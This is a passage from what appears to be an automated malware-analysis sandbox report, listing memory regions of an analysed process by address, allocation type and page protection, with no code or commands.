direct allocation
|
page read and write
|
||
|
B362000
|
direct allocation
|
page execute and read and write
|
||
|
A90000
|
heap
|
page read and write
|
||
|
71B8000
|
trusted library allocation
|
page read and write
|
||
|
43D2000
|
remote allocation
|
page execute and read and write
|
||
|
297EE26B000
|
heap
|
page read and write
|
||
|
1BD18346000
|
heap
|
page read and write
|
||
|
297EDED4000
|
heap
|
page read and write
|
||
|
297D613B000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A27A000
|
heap
|
page read and write
|
||
|
21B0E000
|
stack
|
page read and write
|
||
|
297E5A91000
|
trusted library allocation
|
page read and write
|
||
|
4A25000
|
trusted library allocation
|
page read and write
|
||
|
297EE164000
|
heap
|
page read and write
|
||
|
7F30000
|
trusted library allocation
|
page read and write
|
||
|
80EC000
|
heap
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
8400000
|
direct allocation
|
page read and write
|
||
|
297D6472000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C80000
|
trusted library allocation
|
page read and write
|
||
|
297D3FF0000
|
heap
|
page read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
56695FD000
|
stack
|
page read and write
|
||
|
54D5000
|
trusted library allocation
|
page read and write
|
||
|
7F25000
|
trusted library allocation
|
page read and write
|
||
|
21DBF000
|
stack
|
page read and write
|
||
|
BF8000
|
heap
|
page read and write
|
||
|
297D787E000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A133000
|
heap
|
page read and write
|
||
|
21E4D000
|
stack
|
page read and write
|
||
|
5499000
|
trusted library allocation
|
page read and write
|
||
|
2CDB000
|
heap
|
page read and write
|
||
|
29C0000
|
trusted library allocation
|
page read and write
|
||
|
8430000
|
direct allocation
|
page read and write
|
||
|
297D5950000
|
heap
|
page read and write
|
||
|
7FF848C70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
BFB000
|
heap
|
page read and write
|
||
|
297D5870000
|
heap
|
page read and write
|
||
|
7EB000
|
stack
|
page read and write
|
||
|
297D61DD000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C72000
|
trusted library allocation
|
page read and write
|
||
|
297EE1DD000
|
heap
|
page read and write
|
||
|
83F0000
|
direct allocation
|
page read and write
|
||
|
1BD18299000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
297D3FF7000
|
heap
|
page read and write
|
||
|
297D77ED000
|
trusted library allocation
|
page read and write
|
||
|
299D000
|
trusted library allocation
|
page execute and read and write
|
||
|
21A0E000
|
stack
|
page read and write
|
||
|
297D5A30000
|
heap
|
page execute and read and write
|
||
|
1BD1A235000
|
heap
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
682E000
|
stack
|
page read and write
|
||
|
C0EDABE000
|
stack
|
page read and write
|
||
|
29CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD18250000
|
heap
|
page read and write
|
||
|
547B000
|
trusted library allocation
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
56690FE000
|
stack
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
432E000
|
stack
|
page read and write
|
||
|
1BD1A138000
|
heap
|
page read and write
|
||
|
297D5C97000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A199000
|
heap
|
page read and write
|
||
|
29A0000
|
trusted library allocation
|
page read and write
|
||
|
705F000
|
heap
|
page read and write
|
||
|
6D70000
|
heap
|
page read and write
|
||
|
7061000
|
heap
|
page read and write
|
||
|
5481000
|
trusted library allocation
|
page read and write
|
||
|
297D5F05000
|
trusted library allocation
|
page read and write
|
||
|
297D3E80000
|
heap
|
page read and write
|
||
|
1BD1A131000
|
heap
|
page read and write
|
||
|
21B9E000
|
stack
|
page read and write
|
||
|
1BD1A290000
|
heap
|
page read and write
|
||
|
C0EE60D000
|
stack
|
page read and write
|
||
|
21E55000
|
direct allocation
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848C7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
219CE000
|
stack
|
page read and write
|
||
|
297D58B0000
|
trusted library allocation
|
page read and write
|
||
|
297EE1A2000
|
heap
|
page read and write
|
||
|
297EE28D000
|
heap
|
page read and write
|
||
|
297D5F6C000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
297E5D57000
|
trusted library allocation
|
page read and write
|
||
|
21530000
|
direct allocation
|
page read and write
|
||
|
2993000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FA9000
|
heap
|
page read and write
|
||
|
297D5940000
|
heap
|
page execute and read and write
|
||
|
C0ED14E000
|
stack
|
page read and write
|
||
|
7200000
|
trusted library allocation
|
page read and write
|
||
|
C0ED1CF000
|
stack
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
7FF848D56000
|
trusted library allocation
|
page execute and read and write
|
||
|
712E000
|
stack
|
page read and write
|
||
|
1BD1A235000
|
heap
|
page read and write
|
||
|
1BD18240000
|
heap
|
page read and write
|
||
|
AC5000
|
heap
|
page read and write
|
||
|
7DF40CF80000
|
trusted library allocation
|
page execute and read and write
|
||
|
21560000
|
direct allocation
|
page read and write
|
||
|
1BD18346000
|
heap
|
page read and write
|
||
|
43FE000
|
stack
|
page read and write
|
||
|
297EE081000
|
heap
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
8060000
|
trusted library allocation
|
page execute and read and write
|
||
|
4471000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
56693FF000
|
stack
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
8320000
|
trusted library allocation
|
page read and write
|
||
|
C0EE70B000
|
stack
|
page read and write
|
||
|
6A60000
|
direct allocation
|
page read and write
|
||
|
297EE249000
|
heap
|
page read and write
|
||
|
686E000
|
stack
|
page read and write
|
||
|
297D77E9000
|
trusted library allocation
|
page read and write
|
||
|
1BD1836A000
|
heap
|
page read and write
|
||
|
67EE000
|
stack
|
page read and write
|
||
|
297EE1EC000
|
heap
|
page read and write
|
||
|
83D0000
|
direct allocation
|
page read and write
|
||
|
297EDF1A000
|
heap
|
page read and write
|
||
|
7FBC000
|
stack
|
page read and write
|
||
|
297EDF7D000
|
heap
|
page read and write
|
||
|
1BD1A14B000
|
heap
|
page read and write
|
||
|
7D1E000
|
stack
|
page read and write
|
||
|
C0EDB3E000
|
stack
|
page read and write
|
||
|
1BD1836B000
|
heap
|
page read and write
|
||
|
21540000
|
direct allocation
|
page read and write
|
||
|
C0ED779000
|
stack
|
page read and write
|
||
|
2FD2000
|
remote allocation
|
page execute and read and write
|
||
|
297D5AF5000
|
trusted library allocation
|
page read and write
|
||
|
4460000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
45C8000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A161000
|
heap
|
page read and write
|
||
|
C0ED837000
|
stack
|
page read and write
|
||
|
21510000
|
direct allocation
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
1BD18360000
|
heap
|
page read and write
|
||
|
B10000
|
direct allocation
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
BB9000
|
heap
|
page read and write
|
||
|
57D2000
|
remote allocation
|
page execute and read and write
|
||
|
5668FFE000
|
stack
|
page read and write
|
||
|
26A7000
|
stack
|
page read and write
|
||
|
2A00000
|
heap
|
page readonly
|
||
|
1BD18368000
|
heap
|
page read and write
|
||
|
297D5955000
|
heap
|
page read and write
|
||
|
297EDEE8000
|
heap
|
page read and write
|
||
|
297D662A000
|
trusted library allocation
|
page read and write
|
||
|
297D7826000
|
trusted library allocation
|
page read and write
|
||
|
297D58E0000
|
heap
|
page readonly
|
||
|
69F0000
|
direct allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
297EDF28000
|
heap
|
page read and write
|
||
|
71AD000
|
stack
|
page read and write
|
||
|
1BD18270000
|
heap
|
page read and write
|
||
|
4400000
|
trusted library allocation
|
page read and write
|
||
|
1BD18368000
|
heap
|
page read and write
|
||
|
1BD1836E000
|
heap
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
2960000
|
trusted library section
|
page read and write
|
||
|
2CA8000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A15D000
|
heap
|
page read and write
|
||
|
7D5F000
|
stack
|
page read and write
|
||
|
A962000
|
direct allocation
|
page execute and read and write
|
||
|
7FF848D2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
83C0000
|
trusted library allocation
|
page read and write
|
||
|
1BD1835B000
|
heap
|
page read and write
|
||
|
21A8D000
|
stack
|
page read and write
|
||
|
1BD1A195000
|
heap
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
1BD184C5000
|
heap
|
page read and write
|
||
|
297D7813000
|
trusted library allocation
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
716E000
|
stack
|
page read and write
|
||
|
1BD1A150000
|
heap
|
page read and write
|
||
|
7FF848C73000
|
trusted library allocation
|
page execute and read and write
|
||
|
297D74A2000
|
trusted library allocation
|
page read and write
|
||
|
6F99000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
21BDE000
|
stack
|
page read and write
|
||
|
297D3FB3000
|
heap
|
page read and write
|
||
|
44CB000
|
trusted library allocation
|
page read and write
|
||
|
C0EDA3E000
|
stack
|
page read and write
|
||
|
297EE276000
|
heap
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
29D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D7E000
|
stack
|
page read and write
|
||
|
21D40000
|
remote allocation
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
2859000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
C0ED47E000
|
stack
|
page read and write
|
||
|
297EE030000
|
heap
|
page execute and read and write
|
||
|
7FF848E21000
|
trusted library allocation
|
page read and write
|
||
|
297D3FAF000
|
heap
|
page read and write
|
||
|
297D4085000
|
heap
|
page read and write
|
||
|
7AC000
|
stack
|
page read and write
|
||
|
29B8000
|
heap
|
page read and write
|
||
|
2990000
|
trusted library allocation
|
page read and write
|
||
|
297D7840000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
6965000
|
heap
|
page execute and read and write
|
||
|
39D2000
|
remote allocation
|
page execute and read and write
|
||
|
BBB000
|
heap
|
page read and write
|
||
|
29F0000
|
trusted library allocation
|
page read and write
|
||
|
297D400F000
|
heap
|
page read and write
|
||
|
1BD1A232000
|
heap
|
page read and write
|
||
|
6960000
|
heap
|
page execute and read and write
|
||
|
1BD1A25C000
|
heap
|
page read and write
|
||
|
83E0000
|
direct allocation
|
page read and write
|
||
|
C0ED8BB000
|
stack
|
page read and write
|
||
|
7FF848E55000
|
trusted library allocation
|
page read and write
|
||
|
8B62000
|
direct allocation
|
page execute and read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
297D5EFD000
|
trusted library allocation
|
page read and write
|
||
|
2A9B000
|
heap
|
page read and write
|
||
|
7FF848E52000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C8B000
|
trusted library allocation
|
page read and write
|
||
|
297E5A71000
|
trusted library allocation
|
page read and write
|
||
|
6A30000
|
direct allocation
|
page read and write
|
||
|
297EE217000
|
heap
|
page read and write
|
||
|
297D5A60000
|
heap
|
page read and write
|
||
|
BFB000
|
heap
|
page read and write
|
||
|
9562000
|
direct allocation
|
page execute and read and write
|
||
|
21A4D000
|
stack
|
page read and write
|
||
|
1BD18346000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
C0ED7BF000
|
stack
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
BB9000
|
heap
|
page read and write
|
||
|
BB9000
|
heap
|
page read and write
|
||
|
1BD1A132000
|
heap
|
page read and write
|
||
|
1BD1A144000
|
heap
|
page read and write
|
||
|
7FF848E2A000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A143000
|
heap
|
page read and write
|
||
|
2AAA000
|
heap
|
page read and write
|
||
|
8A50000
|
direct allocation
|
page execute and read and write
|
||
|
29D2000
|
trusted library allocation
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
297D5960000
|
trusted library allocation
|
page read and write
|
||
|
297EE060000
|
heap
|
page read and write
|
||
|
2EC0000
|
remote allocation
|
page execute and read and write
|
||
|
297EE170000
|
heap
|
page read and write
|
||
|
703B000
|
heap
|
page read and write
|
||
|
1BD1A144000
|
heap
|
page read and write
|
||
|
297EE178000
|
heap
|
page read and write
|
||
|
1BD1A158000
|
heap
|
page read and write
|
||
|
6A20000
|
direct allocation
|
page read and write
|
||
|
297D6632000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A130000
|
heap
|
page read and write
|
||
|
21C30000
|
heap
|
page read and write
|
||
|
1BD1A143000
|
heap
|
page read and write
|
||
|
6D6E000
|
stack
|
page read and write
|
||
|
2A1D000
|
heap
|
page read and write
|
||
|
BA7000
|
heap
|
page read and write
|
||
|
297D5990000
|
trusted library allocation
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page read and write
|
||
|
2980000
|
trusted library allocation
|
page read and write
|
||
|
56698FB000
|
stack
|
page read and write
|
||
|
1BD18308000
|
heap
|
page read and write
|
||
|
297D7995000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E57000
|
trusted library allocation
|
page read and write
|
||
|
1BD19DE0000
|
heap
|
page read and write
|
||
|
218F0000
|
heap
|
page read and write
|
||
|
80C3000
|
heap
|
page read and write
|
||
|
297EE1E1000
|
heap
|
page read and write
|
||
|
1BD1A195000
|
heap
|
page read and write
|
||
|
2A44000
|
heap
|
page read and write
|
||
|
BBE000
|
heap
|
page read and write
|
||
|
297EDEC6000
|
heap
|
page read and write
|
||
|
BBE000
|
heap
|
page read and write
|
||
|
297D7050000
|
trusted library allocation
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
297D6614000
|
trusted library allocation
|
page read and write
|
||
|
297D4060000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page readonly
|
||
|
297D5F15000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
1BD182E1000
|
heap
|
page read and write
|
||
|
82F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
B30000
|
direct allocation
|
page read and write
|
||
|
1BD1A158000
|
heap
|
page read and write
|
||
|
2194E000
|
stack
|
page read and write
|
||
|
C0ED0C3000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
80BF000
|
heap
|
page read and write
|
||
|
43BC000
|
stack
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
1BD18351000
|
heap
|
page read and write
|
||
|
6EA2000
|
heap
|
page read and write
|
||
|
68EE000
|
stack
|
page read and write
|
||
|
297D7803000
|
trusted library allocation
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
68AE000
|
stack
|
page read and write
|
||
|
2198F000
|
stack
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A155000
|
heap
|
page read and write
|
||
|
8076000
|
heap
|
page read and write
|
||
|
80E8000
|
heap
|
page read and write
|
||
|
BD62000
|
direct allocation
|
page execute and read and write
|
||
|
297EE174000
|
heap
|
page read and write
|
||
|
704D000
|
heap
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
297D3FA5000
|
heap
|
page read and write
|
||
|
1BD182AF000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
56696FE000
|
stack
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
8300000
|
trusted library allocation
|
page read and write
|
||
|
297D4090000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
297D7882000
|
trusted library allocation
|
page read and write
|
||
|
7056000
|
heap
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A283000
|
heap
|
page read and write
|
||
|
C0ED9BE000
|
stack
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
297D7800000
|
trusted library allocation
|
page read and write
|
||
|
1BD18346000
|
heap
|
page read and write
|
||
|
7042000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
C0ED57C000
|
stack
|
page read and write
|
||
|
1BD1A24B000
|
heap
|
page read and write
|
||
|
6F90000
|
heap
|
page read and write
|
||
|
21590000
|
direct allocation
|
page read and write
|
||
|
BB2000
|
heap
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page read and write
|
||
|
6A40000
|
direct allocation
|
page read and write
|
||
|
7240000
|
trusted library allocation
|
page read and write
|
||
|
297D6643000
|
trusted library allocation
|
page read and write
|
||
|
297D3FA9000
|
heap
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
C0ED4FE000
|
stack
|
page read and write
|
||
|
297D3F77000
|
heap
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A195000
|
heap
|
page read and write
|
||
|
297EE380000
|
heap
|
page read and write
|
||
|
297D5A37000
|
heap
|
page execute and read and write
|
||
|
6D80000
|
heap
|
page read and write
|
||
|
BB9000
|
heap
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
26AD000
|
stack
|
page read and write
|
||
|
C0ED5FE000
|
stack
|
page read and write
|
||
|
56692FF000
|
stack
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A230000
|
heap
|
page read and write
|
||
|
4A1F000
|
trusted library allocation
|
page read and write
|
||
|
297EDA75000
|
heap
|
page read and write
|
||
|
8070000
|
heap
|
page read and write
|
||
|
297D4021000
|
heap
|
page read and write
|
||
|
297D3FC5000
|
heap
|
page read and write
|
||
|
C0ED67E000
|
stack
|
page read and write
|
||
|
5668EFA000
|
stack
|
page read and write
|
||
|
1BD1A161000
|
heap
|
page read and write
|
||
|
7F7C000
|
stack
|
page read and write
|
||
|
266C000
|
stack
|
page read and write
|
||
|
297D58D0000
|
trusted library allocation
|
page read and write
|
||
|
297D4080000
|
heap
|
page read and write
|
||
|
21570000
|
direct allocation
|
page read and write
|
||
|
1BD1834C000
|
heap
|
page read and write
|
||
|
1BD18440000
|
heap
|
page read and write
|
||
|
1BD18368000
|
heap
|
page read and write
|
||
|
7FF848D20000
|
trusted library allocation
|
page read and write
|
||
|
297D780B000
|
trusted library allocation
|
page read and write
|
There are 469 hidden memdumps, click here to show them.